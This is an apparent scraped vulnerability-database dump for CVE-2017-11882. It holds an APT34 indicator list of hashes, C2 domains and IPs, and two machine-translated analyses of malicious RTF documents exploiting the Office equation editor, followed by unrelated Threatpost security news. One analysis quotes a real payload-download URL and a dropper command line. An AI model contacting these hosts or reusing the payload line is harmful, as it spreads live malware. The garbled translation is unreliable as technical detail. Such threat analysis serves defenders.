\n\n63D66D99E46FB93676A4F475A65566D8 \n \n94.23.172.164:80\n\n| \n\nMalware Staging Server \n \ndupdatechecker.doc\n\n| \n\nD85818E82A6E64CA185EDFDDBA2D1B76 \n \ndupdatechecker.exe\n\n| \n\nC9F16F0BE8C77F0170B9B6CE876ED7FB \n \nproxycheker[.]pro\n\n| \n\nC2 \n \n46.105.221.247\n\n| \n\nHas resolved mumbai-m[.]site &amp; hpserver[.]online \n \n148.251.55.110\n\n| \n\nHas resolved mumbai-m[.]site and dns-update[.]club \n \n185.15.247.147\n\n| \n\nHas resolved dns-update[.]club \n \n145.239.33.100\n\n| \n\nHas resolved dns-update[.]club \n \n82.102.14.219\n\n| \n\nHas resolved ns2.dns-update[.]club &amp; hpserver[.]online &amp; anyportals[.]com \n \nv7-hpserver.online.hta\n\n| \n\nE6AC6F18256C4DDE5BF06A9191562F82 \n \ndUpdateCheckers.base\n\n| \n\n3C63BFF9EC0A340E0727E5683466F435 \n \nhUpdateCheckers.base\n\n| \n\nEEB0FF0D8841C2EBE643FE328B6D9EF5 \n \ncUpdateCheckers.bat\n\n| \n\nFB464C365B94B03826E67EABE4BF9165 \n \ndUpdateCheckers.ps1\n\n| \n\n635ED85BFCAAB7208A8B5C730D3D0A8C \n \nhUpdateCheckers.ps1\n\n| \n\n13B338C47C52DE3ED0B68E1CB7876AD2 \n \ngoogleupdateschecker.vbs\n\n| \n\nDBFEA6154D4F9D7209C1875B2D5D70D5 \n \nhpserver[.]online\n\n| \n\nC2 \n \nv7-anyportals.hta\n\n| \n\nEAF3448808481FB1FDBB675BC5EA24DE \n \ndUpdateCheckers.base\n\n| \n\n42449DD79EA7D2B5B6482B6F0D493498 \n \nhUpdateCheckers.base\n\n| \n\nA3FCB4D23C3153DD42AC124B112F1BAE \n \ndUpdateCheckers.ps1\n\n| \n\nEE1C482C41738AAA5964730DCBAB5DFF \n \nhUpdateCheckers.ps1\n\n| \n\nE516C3A3247AF2F2323291A670086A8F \n \nanyportals[.]com\n\n| \n\nC2\n", "modified": "2017-12-07T12:00:00", "published": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-25T17:29:45", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "! [](/Article/UploadPic/2018-12/20181225205545726. png) \nRecently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release of the PE file is used to collect the target user's sensitive information. \n\nFirst, the basic situation \nIn the experimental environment win764, the Office 2010 open the document, process monitoring, found that the winword process is executed after the \u9996\u5148\u6267\u884cexcel.exe that \u7136\u540e\u8fd0\u884cEQNEDT32.exe that \u63a5\u7740\u8fd0\u884ccmd.exe finally run A process. X, in which EQNEDT32. exe running twice. \u770b\u5230EQNEDT32.exe bottle feel should be cve-2017-11882 or cve-2018-0802 samples. \nThe document is opened, display as a empty document, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545737. png) \nOn the figure, inadvertently probably thought it was empty, in fact, a closer look, found the top left a small black point icon. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545312. png) \nDouble-click the Find pop-up window, as shown below. Display the\u201cwindows cannot open this file: A. X\u201d. Obviously, the\u201csmall black dot\u201dshould be an external object. \n! [](/Article/UploadPic/2018-12/20181225205545780. png) \nRight-click the object, select\u201cpackager shell object\u201dobject, you can view the object's\u201cproperties\u201d. As shown below. \n! [](/Article/UploadPic/2018-12/20181225205545220. png) \nIts object properties as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545229. png) \nSee here, we it can be concluded that: the sample should be is to use the RTF is embedded in a PE object in the open document when the default release to the%temp%directory, then use cve-2017-11882 or cve-2018-0802 execution of the process. \n\nSecond, the RTF analysis \n1, the document structure analysis \n! [](/Article/UploadPic/2018-12/20181225205545186. png) \nUse rtfobj attack on the document analysis, finding its embedded two objects, respectively, is a package object and an Excel. Sheet. 8 object. As shown in Fig. Package object the original file is\u201cC:\\\\\\Users\\\\\\n3o\\\\\\AppData\\\\\\Local\\\\\\Microsoft\\\\\\Windows\\\\\\INetCache\\\\\\Content.Word\\\\\\A.X\u201dit. From this it can be seen, the author of the document[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)user name: n3o on. \nWherein A. X is the release of the malicious PE file. \nThe other one is an embedded excel table object, we put the extract of the excel table the suffix renamed. xls after excel is opened. Find it contains two objects AAAA and bbbb are\u201cEquation. 3\u201dthe object, as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545928. png) \nTo extract the excel table object, which is the document structure as shown below. \n! [](/Article/UploadPic/2018-12/20181225205545742. png) \nThe table includes two CLSID for\u201c0002ce02-0000-0000-c000-000000000046\u201dMicrosoft Equation 3.0 object MBD0002E630 and MBD0002E631, you can see the modification time for the 2018/5/21 17:of 52. \n! [](/Article/UploadPic/2018-12/20181225205545793. png) \nIn addition, two\u201cMicrosoft Equation 3.0\u201dobject. Ole10Native size of 59 bytes and 160 bytes, which contains a\u201ccmd.exe /c %tmp%\\A. X\u201dused to perform A. The X process. Should be used in combination for cve-2017-11882 and cve-2018-0802 two vulnerabilities. \nThus, we can fundamental analysis clear the sample, the overall flow diagram as the following figure shown. \n! [](/Article/UploadPic/2018-12/20181225205545654. png) \n2, the static document \nUse winhex to open, you can find the first package object in File 0x2A8A. Wherein 0x00137158 refers to the size of the object, that is, the decimal 1274200, it is the release of A. X size. Followed by IS PE file in winhex we can see that the author put the PE head 0x4D5A has been modified, inserted in the middle 0x090d is divided, so that it becomes[0x090d]4[0x090d]d[0x090d]5[0x090d]a[0x090d], in fact, is 0x4d5a, such an operation should be in order to avoid certain anti-virus of Avira, not directly to 0x4d5a9000 the look of the rendering, a look that is clearly of the PE file. Specific as shown below: \n! [](/Article/UploadPic/2018-12/20181225205545840. png) \nAnother object in 0x299061 position, is an Exce. Sheet. 8 object. Its size is 0x00005C00, that is, the decimal 23552, and rtfobj extracted exel size consistent. The author of the compound document header has changed, with 0x0909 is divided, so that d0cf11 at the beginning of the composite document into the d[0x0909]0[0x0909]\u3002 Should also be a certain sense of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)\n\n**[1] [[2]](<92510_2.htm>) [[3]](<92510_3.htm>) [next](<92510_2.htm>)**\n", "edition": 1, "modified": "2018-12-25T00:00:00", "published": "2018-12-25T00:00:00", "id": "MYHACK58:62201892510", "href": "http://www.myhack58.com/Article/html/3/62/2018/92510.htm", "title": "A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-02T18:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in the 0x089E at the beginning to the end. \n! [](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png! small) \nThe first part of the shellcode to jump to the second part of the compilation command as shown below: \n! [](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png! small) \nAfter analysis, found that the segment of shellcode, a series of jmp jump instruction operation, due to shellcode obfuscation and protection. For example, the following figure shows: \n! [](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png! small)\n\n**[1] [[2]](<92253_2.htm>) [next](<92253_2.htm>)**\n", "edition": 1, "modified": "2018-12-02T00:00:00", "published": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:20", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA) giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and using Outside In, processes the message on Exchange exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. \u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "modified": "2013-08-14T20:51:00", "published": "2013-08-14T16:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged an analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. \u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "modified": "2014-02-25T21:37:11", "published": "2014-02-25T16:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:35", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**Update:** Microsoft today has reversed course on its decision to suspend security email notifications, and will resume doing so on Thursday.\n\nThe original decision, made in response to Canada\u2019s antispam law set to go into effect tomorrow, was announced on Friday. This afternoon, however, a Microsoft spokesman said the email notifications will begin again with this week\u2019s advanced notification of the July Patch Tuesday security advisories.\n\n\u201cWe have reviewed our processes and will resume these security notifications with our monthly Advanced Notification Service (ANS) on July 3, 2014,\u201d the company\u2019s statement said.\n\nThe move baffled many in the security community, who came to expect the monthly emails, which provide information on what applications will be patched on the next Patch Tuesday. Microsoft has used this as a main communications channel for keeping its enterprise customers apprised of what\u2019s going in terms of security for the better part of a decade now. After the company began releasing its security patches on a regular monthly schedule, it started sending emails to customers a few days beforehand to let them know how many and what kinds of patches to expect.\n\nMicrosoft also sends out regular messages about new security advisories or when new information is added to a bulletin, such as when active attacks against a given flaw are seen or when a workaround is developed. Microsoft posted last week to the Full Disclosure security mailing list that the move was in response to an unspecified change in government regulation.\n\n\u201cAs of July 1, 2014, due to changing governmental policies concerning the issuance of automated electronic messaging, Microsoft is suspending the use of email notifications that announce the following:\n\n * Security bulletin advance notifications\n * Security bulletin summaries\n * New security advisories and bulletins\n * Major and minor revisions to security advisories and bulletins\n\nMicrosoft recommended customers subscribe to one or more of its RSS feeds described on the Security TechCenter website.\n\nSeveral sources indicated that the change is related to a new anti-spam law going into effect in Canada.\n\nIn addition to its email notifications, Microsoft posts all of its new bulletins, advance Patch Tuesday notifications and other security information on a number of channels, including various company blogs, Twitter and elsewhere.\n\n_This story was updated at 6:30 p.m. ET._\n", "modified": "2014-07-01T14:30:49", "published": "2014-06-30T13:37:05", "id": "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "href": "https://threatpost.com/microsoft-to-end-email-security-notifications/106916/", "type": "threatpost", "title": "Microsoft to End Email Security Notifications", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker \ndisk-encryption technology as \u201crelatively low risk,\u201d noting that \nattackers must not only have physical access to a targeted PC, but must \nmanipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "modified": "2018-08-15T13:57:07", "published": "2009-12-08T20:24:42", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday \nguidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security \nDevelopment Lifecycle (SDL) to Agile, an umbrella term for a \ndevelopment model frequently used for Web-based applications released \nunder short deadlines, called \u201csprints.\u201dilding online applications and for those \nusing the Agile code-development process. [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). [Computerworld]\n", "modified": "2018-08-15T14:14:29", "published": "2009-11-09T18:26:11", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force a Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). _\n", "modified": "2015-07-28T14:23:41", "published": "2015-07-23T09:14:36", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "modified": "2014-09-25T18:08:18", "published": "2014-09-23T08:53:50", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Micros[](<https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/>)oft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworhty Computing Group said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it\u2019s possible that it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "modified": "2013-04-17T16:33:07", "published": "2011-12-20T16:01:26", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the 